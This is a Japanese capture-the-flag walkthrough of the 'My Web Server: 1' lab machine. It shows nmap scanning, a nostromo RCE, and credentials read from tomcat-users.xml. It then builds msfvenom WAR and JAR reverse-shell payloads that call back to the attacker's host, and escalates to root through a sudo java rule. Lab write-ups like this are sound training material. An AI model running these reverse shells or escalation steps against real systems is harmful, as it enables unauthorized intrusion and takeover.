My Web Server:1 のwalkthrough
はじめに
これをやった
調査・攻撃
nmap地獄
$ nmap -sV -Pn -A 192.168.111.9 Starting Nmap 7.60 ( https://nmap.org ) at 2020-04-15 10:35 JST Nmap scan report for 192.168.111.9 Host is up (0.0013s latency). Not shown: 995 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0) | ssh-hostkey: | 2048 cd:dc:8f:24:51:73:54:bc:87:62:a2:e6:ed:f1:c1:b4 (RSA) | 256 a9:39:a9:bf:b2:f7:01:22:65:07:be:15:48:e8:ef:11 (ECDSA) |_ 256 77:f5:a9:ff:a6:44:7c:9c:34:41:f1:ec:73:5e:57:bd (EdDSA) 80/tcp open http Apache httpd 2.4.38 ((Debian)) |_http-generator: WordPress 5.3.2 | http-robots.txt: 1 disallowed entry |_/wp-admin/ |_http-server-header: Apache/2.4.38 (Debian) |_http-title: Armour – Just another WordPress site 2222/tcp open http nostromo 1.9.6 |_http-server-header: nostromo 1.9.6 |_http-title: Radius by TEMPLATED 3306/tcp open mysql MySQL (unauthorized) 8081/tcp open http nginx 1.14.2 |_http-server-header: nginx/1.14.2 |_http-title: Visualize by TEMPLATED Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 20.83 seconds
searchsploitでいろいろ調べてみると、nostromo 1.9.6
にRCEの脆弱性があるようなので、使ってreverse shellをとる
/etc/sudoers.d
にREADME
とmysudo
があった
$ cat mysudo tomcat ALL=(ALL) NOPASSWD:/usr/lib/jvm/adoptopenjdk-8-hotspot-amd64/bin/java
ということなので、tomcatユーザ権限を取ればroot権限をとれる
tomcatユーザの調査を行う
$ find / -name tomcat 2>/dev/null /opt/tomcat /usr/local/tomcat
$ cat tomcat-users.xml <?xml version='1.0' encoding='utf-8'?> <!-- Licensed to the Apache Software Foundation (ASF) under one or more contributor license agreements. See the NOTICE file distributed with this work for additional information regarding copyright ownership. The ASF licenses this file to You under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. --> <tomcat-users xmlns="http://tomcat.apache.org/xml" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://tomcat.apache.org/xml tomcat-users.xsd" version="1.0"> <role rolename="manager-gui"/> <user username="tomcat" password="@sprot0230sp" roles="manager-gui"/> <role rolename="admin-gui"/> <user username="admin" password="as3epr04irto" roles="admin-gui"/> <!-- NOTE: By default, no user is included in the "manager-gui" role required to operate the "/manager/html" web application. If you wish to use this app, you must define such a user - the username and password are arbitrary. It is strongly recommended that you do NOT use one of the users in the commented out section below since they are intended for use with the examples web application. --> <!-- NOTE: The sample user and role entries below are intended for use with the examples web application. They are wrapped in a comment and thus are ignored when reading this file. If you wish to configure these users for use with the examples web application, do not forget to remove the <!.. ..> that surrounds them. You will also need to set the passwords to something appropriate. --> <!-- <role rolename="tomcat"/> <role rolename="role1"/> <user username="tomcat" password="<must-be-changed>" roles="tomcat"/> <user username="both" password="<must-be-changed>" roles="tomcat,role1"/> <user username="role1" password="<must-be-changed>" roles="role1"/> --> </tomcat-users>
ということで、tomcatのpasswordは@sprot0230sp
なようなので、tomcatにログインする
tomcatにログインすると、warファイルをアップロードできるので、そのことを利用してshellを取る
下記の記事の通りにmsfvenom
を使用してwarファイルを作成する
www.hackingarticles.in
$ msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.111.28 LPORT=8001 -f war > ./java.war Payload size: 1103 bytes Final size of war file: 1103 bytes
作成したhttp://192.168.111.9:8080/java/
にアクセスすることでリバースシェルをとる
$ ncat -lvp 8001 Ncat: Version 7.60 ( https://nmap.org/ncat ) Ncat: Generating a temporary 1024-bit RSA key. Use --ssl-key and --ssl-cert to use a permanent one. Ncat: SHA-1 fingerprint: 8A35 CC8A A242 2509 93CB 0F8B 4D08 D92E 2837 C1B8 Ncat: Listening on :::8001 Ncat: Listening on 0.0.0.0:8001 Ncat: Connection from 192.168.111.9. Ncat: Connection from 192.168.111.9:49108. python -c "import pty;pty.spwan('/bin/bash');" tomcat@webserver:~$
mysudo
にあったように、javaがroot権限で動かせるので、warファイルを作ったときと同様にjarファイルを作成する
$ msfvenom java -f jar -p java/shell_reverse_tcp LHOST=192.168.111.28 LPORT=8002 -o shell.jar
作ったshell.jar
をwget等でダウンロードさせ、実行する
$ msfvenom java -f jar -p java/shell_reverse_tcp LHOST=192.168.111.28 LPORT=8002 -o shell.jar $ python2 -m SimpleHTTPServer 8080 tomcat@webserver:~$ wget http://192.168.111.28:8080/shell.jar --2020-04-15 20:33:45-- http://192.168.111.28:8080/shell.jar Connecting to 192.168.111.28:8080... connected. HTTP request sent, awaiting response... 200 OK Length: 7552 (7.4K) [application/java-archive] Saving to: ‘shell.jar’ shell.jar 100%[===================>] 7.38K --.-KB/s in 0.02s 2020-04-15 20:33:45 (418 KB/s) - ‘shell.jar’ saved [7552/7552] tomcat@webserver:~$ sudo -u root java -jar shell.jar sudo: unable to resolve host webserver: Name or service not known
待ち受け側
$ ncat -lvp 8002 Ncat: Version 7.60 ( https://nmap.org/ncat ) Ncat: Generating a temporary 1024-bit RSA key. Use --ssl-key and --ssl-cert to use a permanent one. Ncat: SHA-1 fingerprint: EDB6 FA48 3B73 E837 AAA6 E009 EC1F 80D6 CB34 32DB Ncat: Listening on :::8002 Ncat: Listening on 0.0.0.0:8002 Ncat: Connection from 192.168.111.9. Ncat: Connection from 192.168.111.9:34584. python3 -c "import pty; pty.spawn('/bin/bash');" root@webserver:/opt/tomcat# root@webserver:/opt/tomcat# cd /root root@webserver:~# ls proof.txt root@webserver:~# cat proof.txt Best of Luck $2y$12$EUztpmoFH8LjEzUBVyNKw.9AKf37uZWPxJp.A3eep2ff0LbLYZrFq
終わりに
初めてのDifficulty: Medium/Intermediate Levelだったが、似た問題やったことがあったので、そこまで時間はかからなかった 次からはOSCP Likeな問題をやっていく